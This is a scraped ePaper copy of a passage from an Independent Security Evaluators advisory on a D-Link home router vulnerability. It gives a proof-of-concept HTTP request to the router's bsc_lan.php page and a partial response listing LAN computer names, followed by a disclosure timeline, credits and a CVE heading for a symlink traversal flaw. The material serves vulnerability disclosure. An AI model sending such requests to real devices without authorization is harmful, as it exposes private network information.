ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
♦ Additional information for vendors regarding immediate and long term fixes for<br />
these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors<br />
Solution<br />
- There currently is not a solution to this problem.<br />
- Restrict access to WAN services such as remote management.<br />
Proof of Concept Exploit<br />
HTTP Request <br />
GET /bsc_lan.php HTTP/1.1 <br />
Host: 192.168.0.1 <br />
User-‐Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0 <br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <br />
Accept-‐Language: en-‐US,en;q=0.5 <br />
Accept-‐Encoding: gzip, deflate <br />
DNT: 1 <br />
Referer: http://192.168.0.1/bsc_wlan_main.php <br />
Cookie: uid=JbaHbdg7nO <br />
Connection: keep-‐alive <br />
Cache-‐Control: max-‐age=0 <br />
Partial HTTP Response<br />
Computer Name <br />
bt (192.168.0.100) <br />
lappy (192.168.0.101) <br />
Disclosure Timeline<br />
♦ 3/2013 - Notified D-Link. No response.<br />
♦ 4/3/2013 - Notified D-Link requesting a follow up.<br />
♦ 7/26/2013 - Public Disclosure<br />
References<br />
♦ Advisory/Video: http://infosec42.blogspot.com<br />
♦ http://securityevaluators.com/content/case-studies/<br />
Credit<br />
♦ Discovered By: Kedy Liu – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong> Evaluators<br />
♦ Exploited By: Kedy Liu – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong> Evaluators<br />
<strong>Vulnerability</strong>: Symlink Traversal <br />
CVE: CVE-2013-4855<br />
<br />
60